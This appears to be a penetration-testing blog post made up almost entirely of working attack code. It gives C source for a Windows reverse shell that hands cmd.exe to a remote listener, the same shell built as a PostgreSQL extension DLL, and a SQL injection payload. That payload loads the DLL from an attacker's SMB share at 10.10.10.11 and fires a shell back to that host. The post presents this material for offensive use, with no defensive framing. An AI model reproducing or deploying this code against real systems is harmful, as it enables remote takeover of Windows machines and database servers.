---
layout: post
title: "windows reverse shell in C"
tags: pt
---
```c
#include "stdafx.h"

#define _WINSOCK_DEPRECATED_NO_WARNINGS

#include 
#include 

#pragma comment(lib,"ws2_32")

WSADATA wsaData;
SOCKET s1;
struct sockaddr_in hax;
char ip_addr[16];
STARTUPINFO sui;
PROCESS_INFORMATION pi;


int _tmain(int argc, _TCHAR* argv[])
{
	WSAStartup(MAKEWORD(2, 2), &wsaData);
	s1 = WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL,
	    (unsigned int)NULL, (unsigned int)NULL);

	hax.sin_family = AF_INET;
	hax.sin_port = htons(4444);
	hax.sin_addr.s_addr = inet_addr("192.168.2.130");

	WSAConnect(s1, (SOCKADDR*)&hax, sizeof(hax), NULL, NULL, NULL, NULL);

	memset(&sui, 0, sizeof(sui));
	sui.cb = sizeof(sui);
	sui.dwFlags = (STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW);
	sui.hStdInput = sui.hStdOutput = sui.hStdError = (HANDLE) s1;

	TCHAR commandLine[256] = L"cmd.exe";
	CreateProcess(NULL, commandLine, NULL, NULL, TRUE,
	    0, NULL, NULL, &sui, &pi);
}
```
the same thing for PostgreSQL:
- *note:* Must be compiled with the same PostgreSQL version libraries as the PostgreSQL version on the target
- follow visual studio settings here: [Compiling PostgreSQL extensions with Visual Studio on Windows](https://www.2ndquadrant.com/en/blog/compiling-postgresql-extensions-visual-studio-windows/)

```c
#pragma warning(disable : 4996)
#include "postgres.h"
#include <string.h>
#include "fmgr.h"
#include "utils/geo_decls.h"
#include <stdio.h>
#include <winsock2.h>
#include "utils/builtins.h"
#pragma comment(lib, "ws2_32")


#ifdef PG_MODULE_MAGIC
PG_MODULE_MAGIC;
#endif


/* Add a prototype marked PGDLLEXPORT */
PGDLLEXPORT Datum rev_shell(PG_FUNCTION_ARGS);
PG_FUNCTION_INFO_V1(rev_shell);


WSADATA wsaData;
SOCKET s1;
struct sockaddr_in hax;
char ip_addr[16];
STARTUPINFO sui;
PROCESS_INFORMATION pi;


Datum
rev_shell(PG_FUNCTION_ARGS)
{
    /* convert C string to text pointer */
    #define GET_TEXT(cstrp) \
    DatumGetTextP(DirectFunctionCall1(textin, CStringGetDatum(cstrp)))

    /* convert text pointer to C string */
    #define GET_STR(textp) \
    DatumGetCString(DirectFunctionCall1(textout, PointerGetDatum(textp)))

    WSAStartup(MAKEWORD(2, 2), &wsaData);
    s1 = WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, (unsigned int)NULL, (unsigned int)NULL);

    hax.sin_family = AF_INET;
    hax.sin_port = htons(PG_GETARG_INT32(1));
    hax.sin_addr.s_addr = inet_addr(GET_STR(PG_GETARG_TEXT_P(0)));

    WSAConnect(s1, (SOCKADDR*)&hax, sizeof(hax), NULL, NULL, NULL, NULL);

    memset(&sui, 0, sizeof(sui));
    sui.cb = sizeof(sui);
    sui.dwFlags = (STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW);
    sui.hStdInput = sui.hStdOutput = sui.hStdError = (HANDLE) s1;

    CreateProcess(NULL, "cmd.exe", NULL, NULL, TRUE, 0, NULL, NULL, &sui, &pi);
    PG_RETURN_VOID();
}
```
to use this DLL in a SQLi, create a PostgreSQL function, summon the dll from remote location, trigger the function with this payload:
- pre-requisite: host the dll on attacker machine (10.10.10.11 in this example) using smb (assuming target is Windows)

```
;drop function if exists rev_shell(text,integer); CREATE OR REPLACE FUNCTION rev_shell(text,integer) RETURNS void AS $$\\10.10.10.11\share\rev_shell.dll$$, $$rev_shell$$ LANGUAGE C STRICT;SELECT rev_shell($$10.10.10.11$$,4444);--+
```